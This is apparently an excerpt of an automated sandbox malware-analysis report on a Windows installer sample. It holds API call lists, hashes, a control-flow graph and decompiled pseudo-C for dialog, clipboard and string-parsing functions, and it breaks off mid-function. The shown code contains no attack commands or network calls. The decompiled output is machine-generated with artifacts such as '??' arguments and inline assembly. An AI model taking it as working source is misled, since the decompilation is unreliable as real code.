                                                      • SendMessageA.USER32(00000000,00002001,00000000,?), ref: 00405386
                                                      • GetDlgItem.USER32(?,000003F8), ref: 0040525F
                                                        • Part of subcall function 00404051: SendMessageA.USER32(00000028,?,00000001,00403E81), ref: 0040405F
                                                      • GetDlgItem.USER32(?,000003EC), ref: 004053A2
                                                      • CreateThread.KERNEL32(00000000,00000000,Function_00005176,00000000), ref: 004053B0
                                                      • CloseHandle.KERNELBASE(00000000), ref: 004053B7
                                                      • ShowWindow.USER32(00000000), ref: 004053DA
                                                      • ShowWindow.USER32(?,00000008), ref: 004053E1
                                                      • ShowWindow.USER32(00000008), ref: 00405427
                                                      • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040545B
                                                      • CreatePopupMenu.USER32 ref: 0040546C
                                                      • AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 00405481
                                                      • GetWindowRect.USER32(?,000000FF), ref: 004054A1
                                                      • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004054BA
                                                      • SendMessageA.USER32(?,0000102D,00000000,?), ref: 004054F6
                                                      • OpenClipboard.USER32(00000000), ref: 00405506
                                                      • EmptyClipboard.USER32 ref: 0040550C
                                                      • GlobalAlloc.KERNEL32(00000042,?), ref: 00405515
                                                      • GlobalLock.KERNEL32(00000000), ref: 0040551F
                                                      • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405533
                                                      • GlobalUnlock.KERNEL32(00000000), ref: 0040554C
                                                      • SetClipboardData.USER32(00000001,00000000), ref: 00405557
                                                      • CloseClipboard.USER32 ref: 0040555D
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1796335749.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000002.00000002.1796282530.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796418503.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.000000000077B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000780000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000785000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000787000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A9000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007AE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007C6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1798213099.00000000007C7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_download.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                      • String ID:
                                                      • API String ID: 590372296-0
                                                      • Opcode ID: dadd1f5a3a53f6153d4068de795145be5a4dbd7634b151cd1cb0500ee1942e15
                                                      • Instruction ID: cba8cb344929e6fa6818a5c25344ad4bfa6cf128d012b59fb2cbbdf576d19343
                                                      • Opcode Fuzzy Hash: dadd1f5a3a53f6153d4068de795145be5a4dbd7634b151cd1cb0500ee1942e15
                                                      • Instruction Fuzzy Hash: C2A16B70900608BFDF119F64DE89EAE7B79FF48354F00402AFA45B61A1C7794E529F68
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00403B48 Relevance: 48.3, APIs: 32, Instructions: 346windowstringCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 258 403b48-403b5a 259 403b60-403b66 258->259 260 403c9b-403caa 258->260 259->260 261 403b6c-403b75 259->261 262 403cf9-403d0e 260->262 263 403cac-403cf4 GetDlgItem * 2 call 40401c SetClassLongA call 40140b 260->263 264 403b77-403b84 SetWindowPos 261->264 265 403b8a-403b8d 261->265 267 403d10-403d13 262->267 268 403d4e-403d53 call 404068 262->268 263->262 264->265 272 403ba7-403bad 265->272 273 403b8f-403ba1 ShowWindow 265->273 269 403d15-403d20 call 401389 267->269 270 403d46-403d48 267->270 277 403d58-403d73 268->277 269->270 291 403d22-403d41 SendMessageA 269->291 270->268 276 403fe9 270->276 278 403bc9-403bcc 272->278 279 403baf-403bc4 DestroyWindow 272->279 273->272 284 403feb-403ff2 276->284 282 403d75-403d77 call 40140b 277->282 283 403d7c-403d82 277->283 287 403bce-403bda SetWindowLongA 278->287 288 403bdf-403be5 278->288 285 403fc6-403fcc 279->285 282->283 294 403fa7-403fc0 DestroyWindow EndDialog 283->294 295 403d88-403d93 283->295 285->276 293 403fce-403fd4 285->293 287->284 289 403c88-403c96 call 404083 288->289 290 403beb-403bfc GetDlgItem 288->290 289->284 296 403c1b-403c1e 290->296 297 403bfe-403c15 SendMessageA IsWindowEnabled 290->297 291->284 293->276 299 403fd6-403fdf ShowWindow 293->299 294->285 295->294 300 403d99-403de6 call 405f9f call 40401c * 3 GetDlgItem 295->300 301 403c20-403c21 296->301 302 403c23-403c26 296->302 297->276 297->296 299->276 328 403df0-403e2c ShowWindow KiUserCallbackDispatcher call 40403e EnableWindow 300->328 329 403de8-403ded 300->329 305 403c51-403c56 call 403ff5 301->305 306 403c34-403c39 302->306 307 403c28-403c2e 302->307 305->289 310 403c6f-403c82 SendMessageA 306->310 311 403c3b-403c41 306->311 309 403c30-403c32 307->309 307->310 309->305 310->289 315 403c43-403c49 call 40140b 311->315 316 403c58-403c61 call 40140b 311->316 326 403c4f 315->326 316->289 325 403c63-403c6d 316->325 325->326 326->305 332 403e31 328->332 333 403e2e-403e2f 328->333 329->328 334 403e33-403e61 GetSystemMenu EnableMenuItem SendMessageA 332->334 333->334 335 403e63-403e74 SendMessageA 334->335 336 403e76 334->336 337 403e7c-403eb6 call 404051 call 403b29 call 405f7d lstrlenA call 405f9f SetWindowTextA call 401389 335->337 336->337 337->277 348 403ebc-403ebe 337->348 348->277 349 403ec4-403ec8 348->349 350 403ee7-403efb DestroyWindow 349->350 351 403eca-403ed0 349->351 350->285 353 403f01-403f2e CreateDialogParamA 350->353 351->276 352 403ed6-403edc 351->352 352->277 355 403ee2 352->355 353->285 354 403f34-403f8b call 40401c GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 353->354 354->276 360 403f8d-403fa0 ShowWindow call 404068 354->360 355->276 362 403fa5 360->362 362->285
                                                      C-Code - Quality: 84%
                                                      			E00403B48(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
				struct HWND__* _v32;
				void* _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				signed int _t37;
				signed int _t39;
				intOrPtr _t44;
				struct HWND__* _t49;
				signed int _t68;
				struct HWND__* _t74;
				signed int _t87;
				struct HWND__* _t92;
				signed int _t100;
				int _t104;
				signed int _t116;
				signed int _t117;
				int _t118;
				signed int _t123;
				struct HWND__* _t126;
				struct HWND__* _t127;
				int _t128;
				long _t131;
				int _t133;
				int _t134;
				void* _t135;
				void* _t142;
				void* _t143;

				_t116 = _a8;
				if(_t116 == 0x110 || _t116 == 0x408) {
					_t35 = _a12;
					_t126 = _a4;
					__eflags = _t116 - 0x110;
					 *0x79f528 = _t35;
					if(_t116 == 0x110) {
						 *0x7a2f48 = _t126;
						 *0x79f53c = GetDlgItem(_t126, 1);
						_t92 = GetDlgItem(_t126, 2);
						_push(0xffffffff);
						_push("true");
						 *0x79e508 = _t92;
						E0040401C(_t126);
						SetClassLongA(_t126, 0xfffffff2,  *0x7a2728);
						 *0x7a270c = E0040140B(4);
						_t35 = 1;
						__eflags = 1;
						 *0x79f528 = 1;
					}
					_t123 =  *0x40a1dc; // 0x0
					_t134 = 0;
					_t131 = (_t123 << 6) +  *0x7a2f80;
					__eflags = _t123;
					if(_t123 < 0) {
						L34:
						E00404068(0x40b);
						while(1) {
							_t37 =  *0x79f528;
							 *0x40a1dc =  *0x40a1dc + _t37;
							_t131 = _t131 + (_t37 << 6);
							_t39 =  *0x40a1dc; // 0x0
							__eflags = _t39 -  *0x7a2f84; // 0x2
							if(__eflags == 0) {
								E0040140B(1);
							}
							__eflags =  *0x7a270c - _t134; // 0x0
							if(__eflags != 0) {
								break;
							}
							_t44 =  *0x7a2f84; // 0x2
							__eflags =  *0x40a1dc - _t44; // 0x0
							if(__eflags >= 0) {
								break;
							}
							_t117 =  *(_t131 + 0x14);
							E00405F9F(_t117, _t126, _t131, 0x7ab800,  *((intOrPtr*)(_t131 + 0x24)));
							_push( *((intOrPtr*)(_t131 + 0x20)));
							_push(0xfffffc19);
							E0040401C(_t126);
							_push( *((intOrPtr*)(_t131 + 0x1c)));
							_push(0xfffffc1b);
							E0040401C(_t126);
							_push( *((intOrPtr*)(_t131 + 0x28)));
							_push(0xfffffc1a);
							E0040401C(_t126);
							_t49 = GetDlgItem(_t126, 3);
							__eflags =  *0x7a2fec - _t134; // 0x0
							_v32 = _t49;
							if(__eflags != 0) {
								_t117 = _t117 & 0x0000fefd | 0x00000004;
								__eflags = _t117;
							}
							ShowWindow(_t49, _t117 & 0x00000008); // executed
							EnableWindow( *(_t135 + 0x30), _t117 & 0x00000100); // executed
							E0040403E(_t117 & 0x00000002);
							_t118 = _t117 & 0x00000004;
							EnableWindow( *0x79e508, _t118);
							__eflags = _t118 - _t134;
							if(_t118 == _t134) {
								_push(1);
							} else {
								_push(_t134);
							}
							EnableMenuItem(GetSystemMenu(_t126, _t134), 0xf060, ??);
							SendMessageA( *(_t135 + 0x38), 0xf4, _t134, 1);
							__eflags =  *0x7a2fec - _t134; // 0x0
							if(__eflags == 0) {
								_push( *0x79f53c);
							} else {
								SendMessageA(_t126, 0x401, 2, _t134);
								_push( *0x79e508);
							}
							E00404051();
							E00405F7D(0x79f540, E00403B29());
							E00405F9F(0x79f540, _t126, _t131,  &(0x79f540[lstrlenA(0x79f540)]),  *((intOrPtr*)(_t131 + 0x18)));
							SetWindowTextA(_t126, 0x79f540); // executed
							_push(_t134);
							_t68 = E00401389( *((intOrPtr*)(_t131 + 8)));
							__eflags = _t68;
							if(_t68 != 0) {
								continue;
							} else {
								__eflags =  *_t131 - _t134;
								if( *_t131 == _t134) {
									continue;
								}
								__eflags =  *(_t131 + 4) - 5;
								if( *(_t131 + 4) != 5) {
									DestroyWindow( *0x7a2718); // executed
									 *0x79ed18 = _t131;
									__eflags =  *_t131 - _t134;
									if( *_t131 <= _t134) {
										goto L58;
									}
									_t74 = CreateDialogParamA( *0x7a2f40,  *_t131 +  *0x7a2720 & 0x0000ffff, _t126,  *(0x40a1e0 +  *(_t131 + 4) * 4), _t131); // executed
									__eflags = _t74 - _t134;
									 *0x7a2718 = _t74;
									if(_t74 == _t134) {
										goto L58;
									}
									_push( *((intOrPtr*)(_t131 + 0x2c)));
									_push(6);
									E0040401C(_t74);
									GetWindowRect(GetDlgItem(_t126, 0x3fa), _t135 + 0x10);
									ScreenToClient(_t126, _t135 + 0x10);
									SetWindowPos( *0x7a2718, _t134,  *(_t135 + 0x20),  *(_t135 + 0x20), _t134, _t134, 0x15);
									_push(_t134);
									E00401389( *((intOrPtr*)(_t131 + 0xc)));
									__eflags =  *0x7a270c - _t134; // 0x0
									if(__eflags != 0) {
										goto L61;
									}
									ShowWindow( *0x7a2718, 8); // executed
									E00404068(0x405);
									goto L58;
								}
								__eflags =  *0x7a2fec - _t134; // 0x0
								if(__eflags != 0) {
									goto L61;
								}
								__eflags =  *0x7a2fe0 - _t134; // 0x1
								if(__eflags != 0) {
									continue;
								}
								goto L61;
							}
						}
						DestroyWindow( *0x7a2718);
						 *0x7a2f48 = _t134;
						EndDialog(_t126,  *0x79e910);
						goto L58;
					} else {
						__eflags = _t35 - 1;
						if(_t35 != 1) {
							L33:
							__eflags =  *_t131 - _t134;
							if( *_t131 == _t134) {
								goto L61;
							}
							goto L34;
						}
						_push(0);
						_t87 = E00401389( *((intOrPtr*)(_t131 + 0x10)));
						__eflags = _t87;
						if(_t87 == 0) {
							goto L33;
						}
						SendMessageA( *0x7a2718, 0x40f, 0, 1);
						__eflags =  *0x7a270c - _t134; // 0x0
						return 0 | __eflags == 0x00000000;
					}
				} else {
					_t126 = _a4;
					_t134 = 0;
					if(_t116 == 0x47) {
						SetWindowPos( *0x79f520, _t126, 0, 0, 0, 0, 0x13);
					}
					if(_t116 == 5) {
						asm("sbb eax, eax");
						ShowWindow( *0x79f520,  ~(_a12 - 1) & _t116);
					}
					if(_t116 != 0x40d) {
						__eflags = _t116 - 0x11;
						if(_t116 != 0x11) {
							__eflags = _t116 - 0x111;
							if(_t116 != 0x111) {
								L26:
								return E00404083(_t116, _a12, _a16);
							}
							_t133 = _a12 & 0x0000ffff;
							_t127 = GetDlgItem(_t126, _t133);
							__eflags = _t127 - _t134;
							if(_t127 == _t134) {
								L13:
								__eflags = _t133 - 1;
								if(_t133 != 1) {
									__eflags = _t133 - 3;
									if(_t133 != 3) {
										_t128 = 2;
										__eflags = _t133 - _t128;
										if(_t133 != _t128) {
											L25:
											SendMessageA( *0x7a2718, 0x111, _a12, _a16);
											goto L26;
										}
										__eflags =  *0x7a2fec - _t134; // 0x0
										if(__eflags == 0) {
											_t100 = E0040140B(3);
											__eflags = _t100;
											if(_t100 != 0) {
												goto L26;
											}
											 *0x79e910 = 1;
											L21:
											_push(0x78);
											L22:
											E00403FF5();
											goto L26;
										}
										E0040140B(_t128);
										 *0x79e910 = _t128;
										goto L21;
									}
									__eflags =  *0x40a1dc - _t134; // 0x0
									if(__eflags <= 0) {
										goto L25;
									}
									_push(0xffffffff);
									goto L22;
								}
								_push(_t133);
								goto L22;
							}
							SendMessageA(_t127, 0xf3, _t134, _t134);
							_t104 = IsWindowEnabled(_t127);
							__eflags = _t104;
							if(_t104 == 0) {
								goto L61;
							}
							goto L13;
						}
						SetWindowLongA(_t126, _t134, _t134);
						return 1;
					} else {
						DestroyWindow( *0x7a2718);
						 *0x7a2718 = _a12;
						L58:
						_t142 =  *0x7a0540 - _t134; // 0x1
						if(_t142 == 0) {
							_t143 =  *0x7a2718 - _t134; // 0x10408
							if(_t143 != 0) {
								ShowWindow(_t126, 0xa); // executed
								 *0x7a0540 = 1;
							}
						}
						L61:
						return 0;
					}
				}
			}

































                                                      0x00403b51
                                                      0x00403b5a
                                                      0x00403c9b
                                                      0x00403c9f
                                                      0x00403ca3
                                                      0x00403ca5
                                                      0x00403caa
                                                      0x00403cb5
                                                      0x00403cc0
                                                      0x00403cc5
                                                      0x00403cc7
                                                      0x00403cc9
                                                      0x00403ccc
                                                      0x00403cd1
                                                      0x00403cdf
                                                      0x00403cec
                                                      0x00403cf3
                                                      0x00403cf3
                                                      0x00403cf4
                                                      0x00403cf4
                                                      0x00403cf9
                                                      0x00403cff
                                                      0x00403d06
                                                      0x00403d0c
                                                      0x00403d0e
                                                      0x00403d4e
                                                      0x00403d53
                                                      0x00403d58
                                                      0x00403d58
                                                      0x00403d5d
                                                      0x00403d66
                                                      0x00403d68
                                                      0x00403d6d
                                                      0x00403d73
                                                      0x00403d77
                                                      0x00403d77
                                                      0x00403d7c
                                                      0x00403d82
                                                      0x00000000
                                                      0x00000000
                                                      0x00403d88
                                                      0x00403d8d
                                                      0x00403d93
                                                      0x00000000
                                                      0x00000000
                                                      0x00403d9c
                                                      0x00403da4
                                                      0x00403da9
                                                      0x00403dac
                                                      0x00403db2
                                                      0x00403db7
                                                      0x00403dba
                                                      0x00403dc0
                                                      0x00403dc5
                                                      0x00403dc8
                                                      0x00403dce
                                                      0x00403dd6
                                                      0x00403ddc
                                                      0x00403de2
                                                      0x00403de6
                                                      0x00403ded
                                                      0x00403ded
                                                      0x00403ded
                                                      0x00403df7
                                                      0x00403e09
                                                      0x00403e15
                                                      0x00403e1a
                                                      0x00403e24
                                                      0x00403e2a
                                                      0x00403e2c
                                                      0x00403e31
                                                      0x00403e2e
                                                      0x00403e2e
                                                      0x00403e2e
                                                      0x00403e41
                                                      0x00403e59
                                                      0x00403e5b
                                                      0x00403e61
                                                      0x00403e76
                                                      0x00403e63
                                                      0x00403e6c
                                                      0x00403e6e
                                                      0x00403e6e
                                                      0x00403e7c
                                                      0x00403e8d
                                                      0x00403e9e
                                                      0x00403ea5
                                                      0x00403eab
                                                      0x00403eaf
                                                      0x00403eb4
                                                      0x00403eb6
                                                      0x00000000
                                                      0x00403ebc
                                                      0x00403ebc
                                                      0x00403ebe
                                                      0x00000000
                                                      0x00000000
                                                      0x00403ec4
                                                      0x00403ec8
                                                      0x00403eed
                                                      0x00403ef3
                                                      0x00403ef9
                                                      0x00403efb
                                                      0x00000000
                                                      0x00000000
                                                      0x00403f21
                                                      0x00403f27
                                                      0x00403f29
                                                      0x00403f2e
                                                      0x00000000
                                                      0x00000000
                                                      0x00403f34
                                                      0x00403f37
                                                      0x00403f3a
                                                      0x00403f51
                                                      0x00403f5d
                                                      0x00403f76
                                                      0x00403f7c
                                                      0x00403f80
                                                      0x00403f85
                                                      0x00403f8b
                                                      0x00000000
                                                      0x00000000
                                                      0x00403f95
                                                      0x00403fa0
                                                      0x00000000
                                                      0x00403fa0
                                                      0x00403eca
                                                      0x00403ed0
                                                      0x00000000
                                                      0x00000000
                                                      0x00403ed6
                                                      0x00403edc
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00403ee2
                                                      0x00403eb6
                                                      0x00403fad
                                                      0x00403fb9
                                                      0x00403fc0
                                                      0x00000000
                                                      0x00403d10
                                                      0x00403d10
                                                      0x00403d13
                                                      0x00403d46
                                                      0x00403d46
                                                      0x00403d48
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00403d48
                                                      0x00403d15
                                                      0x00403d19
                                                      0x00403d1e
                                                      0x00403d20
                                                      0x00000000
                                                      0x00000000
                                                      0x00403d30
                                                      0x00403d38
                                                      0x00000000
                                                      0x00403d3e
                                                      0x00403b6c
                                                      0x00403b6c
                                                      0x00403b70
                                                      0x00403b75
                                                      0x00403b84
                                                      0x00403b84
                                                      0x00403b8d
                                                      0x00403b96
                                                      0x00403ba1
                                                      0x00403ba1
                                                      0x00403bad
                                                      0x00403bc9
                                                      0x00403bcc
                                                      0x00403bdf
                                                      0x00403be5
                                                      0x00403c88
                                                      0x00000000
                                                      0x00403c91
                                                      0x00403beb
                                                      0x00403bf8
                                                      0x00403bfa
                                                      0x00403bfc
                                                      0x00403c1b
                                                      0x00403c1b
                                                      0x00403c1e
                                                      0x00403c23
                                                      0x00403c26
                                                      0x00403c36
                                                      0x00403c37
                                                      0x00403c39
                                                      0x00403c6f
                                                      0x00403c82
                                                      0x00000000
                                                      0x00403c82
                                                      0x00403c3b
                                                      0x00403c41
                                                      0x00403c5a
                                                      0x00403c5f
                                                      0x00403c61
                                                      0x00000000
                                                      0x00000000
                                                      0x00403c63
                                                      0x00403c4f
                                                      0x00403c4f
                                                      0x00403c51
                                                      0x00403c51
                                                      0x00000000
                                                      0x00403c51
                                                      0x00403c44
                                                      0x00403c49
                                                      0x00000000
                                                      0x00403c49
                                                      0x00403c28
                                                      0x00403c2e
                                                      0x00000000
                                                      0x00000000
                                                      0x00403c30
                                                      0x00000000
                                                      0x00403c30
                                                      0x00403c20
                                                      0x00000000
                                                      0x00403c20
                                                      0x00403c06
                                                      0x00403c0d
                                                      0x00403c13
                                                      0x00403c15
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00403c15
                                                      0x00403bd1
                                                      0x00000000
                                                      0x00403baf
                                                      0x00403bb5
                                                      0x00403bbf
                                                      0x00403fc6
                                                      0x00403fc6
                                                      0x00403fcc
                                                      0x00403fce
                                                      0x00403fd4
                                                      0x00403fd9
                                                      0x00403fdf
                                                      0x00403fdf
                                                      0x00403fd4
                                                      0x00403fe9
                                                      0x00000000
                                                      0x00403fe9
                                                      0x00403bad

                                                      APIs
                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403B84
                                                      • ShowWindow.USER32(?), ref: 00403BA1
                                                      • DestroyWindow.USER32 ref: 00403BB5
                                                      • SetWindowLongA.USER32(?,00000000,00000000), ref: 00403BD1
                                                      • GetDlgItem.USER32(?,?), ref: 00403BF2
                                                      • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403C06
                                                      • IsWindowEnabled.USER32(00000000), ref: 00403C0D
                                                      • GetDlgItem.USER32(?,00000001), ref: 00403CBB
                                                      • GetDlgItem.USER32(?,00000002), ref: 00403CC5
                                                      • SetClassLongA.USER32(?,000000F2,?), ref: 00403CDF
                                                      • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403D30
                                                      • GetDlgItem.USER32(?,00000003), ref: 00403DD6
                                                      • ShowWindow.USER32(00000000,?), ref: 00403DF7
                                                      • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403E09
                                                      • EnableWindow.USER32(?,?), ref: 00403E24
                                                      • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403E3A
                                                      • EnableMenuItem.USER32(00000000), ref: 00403E41
                                                      • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403E59
                                                      • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403E6C
                                                      • lstrlenA.KERNEL32(0079F540,?,0079F540,00000000), ref: 00403E96
                                                      • SetWindowTextA.USER32(?,0079F540), ref: 00403EA5
                                                      • ShowWindow.USER32(?,0000000A), ref: 00403FD9
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1796335749.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000002.00000002.1796282530.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796418503.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.000000000077B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000780000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000785000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000787000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A9000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007AE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007C6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1798213099.00000000007C7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_download.jbxd
                                                      Similarity
                                                      • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                      • String ID:
                                                      • API String ID: 3282139019-0
                                                      • Opcode ID: 15b6375a1e693d3e2cd3c5fe237b60442a4c361cd33fb8cff5c4eaa7748e9161
                                                      • Instruction ID: be3397b8ddd8732ae82b8f0fff634cab03aa6bc43632f84706db7e79d14484ee
                                                      • Opcode Fuzzy Hash: 15b6375a1e693d3e2cd3c5fe237b60442a4c361cd33fb8cff5c4eaa7748e9161
                                                      • Instruction Fuzzy Hash: CEC1C271504600AFEB216F65ED85E2B3ABCEB85706F00453EF641B11F2CB3D9A429B6D
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 706B1A98 Relevance: 20.1, APIs: 13, Instructions: 571stringlibrarymemoryCOMMONCrypto
                                                      Download Yara Rule
                                                      C-Code - Quality: 95%
                                                      			E706B1A98() {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				CHAR* _v24;
				CHAR* _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				CHAR* _v44;
				signed int _v48;
				void* _v52;
				intOrPtr _v56;
				CHAR* _t199;
				signed int _t202;
				void* _t204;
				void* _t206;
				CHAR* _t208;
				void* _t216;
				struct HINSTANCE__* _t217;
				struct HINSTANCE__* _t218;
				struct HINSTANCE__* _t220;
				signed short _t222;
				struct HINSTANCE__* _t225;
				struct HINSTANCE__* _t227;
				void* _t228;
				char* _t229;
				void* _t240;
				signed char _t241;
				signed int _t242;
				void* _t246;
				struct HINSTANCE__* _t248;
				void* _t249;
				signed int _t251;
				signed int _t253;
				signed int _t259;
				signed int _t262;
				signed int _t264;
				void* _t267;
				void* _t271;
				struct HINSTANCE__* _t273;
				signed char _t276;
				void _t277;
				signed int _t278;
				signed int _t290;
				signed int _t291;
				void* _t293;
				signed int _t297;
				signed int _t300;
				signed int _t303;
				signed int _t304;
				signed int _t305;
				signed char _t308;
				signed int _t309;
				CHAR* _t310;
				CHAR* _t312;
				CHAR* _t313;
				struct HINSTANCE__* _t314;
				void* _t316;
				signed int _t317;
				void* _t318;

				_t273 = 0;
				_v32 = 0;
				_v36 = 0;
				_v16 = 0;
				_v8 = 0;
				_v40 = 0;
				_t318 = 0;
				_v48 = 0;
				_t199 = E706B1215();
				_v24 = _t199;
				_v28 = _t199;
				_v44 = E706B1215();
				_t309 = E706B123B();
				_v52 = _t309;
				_v12 = _t309;
				while(1) {
					_t202 = _v32;
					_v56 = _t202;
					if(_t202 != _t273 && _t318 == _t273) {
						break;
					}
					_t308 =  *_t309;
					_t276 = _t308;
					_t204 = _t276 - _t273;
					if(_t204 == 0) {
						_t33 =  &_v32;
						 *_t33 = _v32 | 0xffffffff;
						__eflags =  *_t33;
						L17:
						_t206 = _v56 - _t273;
						if(_t206 == 0) {
							 *_v28 =  *_v28 & 0x00000000;
							__eflags = _t318 - _t273;
							if(_t318 == _t273) {
								_t246 = GlobalAlloc(0x40, 0x14a4); // executed
								_t318 = _t246;
								 *(_t318 + 0x810) = _t273;
								 *(_t318 + 0x814) = _t273;
							}
							_t277 = _v36;
							_t43 = _t318 + 8; // 0x8
							_t208 = _t43;
							_t44 = _t318 + 0x408; // 0x408
							_t310 = _t44;
							 *_t318 = _t277;
							 *_t208 =  *_t208 & 0x00000000;
							 *(_t318 + 0x808) = _t273;
							 *_t310 =  *_t310 & 0x00000000;
							_t278 = _t277 - _t273;
							__eflags = _t278;
							 *(_t318 + 0x80c) = _t273;
							 *(_t318 + 4) = _t273;
							if(_t278 == 0) {
								__eflags = _v28 - _v24;
								if(_v28 == _v24) {
									goto L39;
								}
								_t316 = 0;
								GlobalFree(_t318);
								_t318 = E706B12FE(_v24);
								__eflags = _t318 - _t273;
								if(_t318 == _t273) {
									goto L39;
								} else {
									goto L32;
								}
								while(1) {
									L32:
									_t240 =  *(_t318 + 0x14a0);
									__eflags = _t240 - _t273;
									if(_t240 == _t273) {
										break;
									}
									_t316 = _t318;
									_t318 = _t240;
									__eflags = _t318 - _t273;
									if(_t318 != _t273) {
										continue;
									}
									break;
								}
								__eflags = _t316 - _t273;
								if(_t316 != _t273) {
									 *(_t316 + 0x14a0) = _t273;
								}
								_t241 =  *(_t318 + 0x810);
								__eflags = _t241 & 0x00000008;
								if((_t241 & 0x00000008) == 0) {
									_t242 = _t241 | 0x00000002;
									__eflags = _t242;
									 *(_t318 + 0x810) = _t242;
								} else {
									_t318 = E706B1534(_t318);
									 *(_t318 + 0x810) =  *(_t318 + 0x810) & 0xfffffff5;
								}
								goto L39;
							} else {
								_t290 = _t278 - 1;
								__eflags = _t290;
								if(_t290 == 0) {
									L28:
									lstrcpyA(_t208, _v44);
									L29:
									lstrcpyA(_t310, _v24);
									L39:
									_v12 = _v12 + 1;
									_v28 = _v24;
									L56:
									if(_v32 != 0xffffffff) {
										_t309 = _v12;
										continue;
									}
									break;
								}
								_t291 = _t290 - 1;
								__eflags = _t291;
								if(_t291 == 0) {
									goto L29;
								}
								__eflags = _t291 != 1;
								if(_t291 != 1) {
									goto L39;
								}
								goto L28;
							}
						}
						if(_t206 != 1) {
							goto L39;
						}
						_t248 = _v16;
						if(_v40 == _t273) {
							_t248 = _t248 - 1;
						}
						 *(_t318 + 0x814) = _t248;
						goto L39;
					}
					_t249 = _t204 - 0x23;
					if(_t249 == 0) {
						__eflags = _t309 - _v52;
						if(_t309 <= _v52) {
							L15:
							_v32 = _t273;
							_v36 = _t273;
							goto L17;
						}
						__eflags =  *((char*)(_t309 - 1)) - 0x3a;
						if( *((char*)(_t309 - 1)) != 0x3a) {
							goto L15;
						}
						__eflags = _v32 - _t273;
						if(_v32 == _t273) {
							L40:
							_t251 = _v32 - _t273;
							__eflags = _t251;
							if(_t251 == 0) {
								__eflags = _t308 - 0x2a;
								if(_t308 == 0x2a) {
									_v36 = 2;
									L54:
									_t309 = _v12;
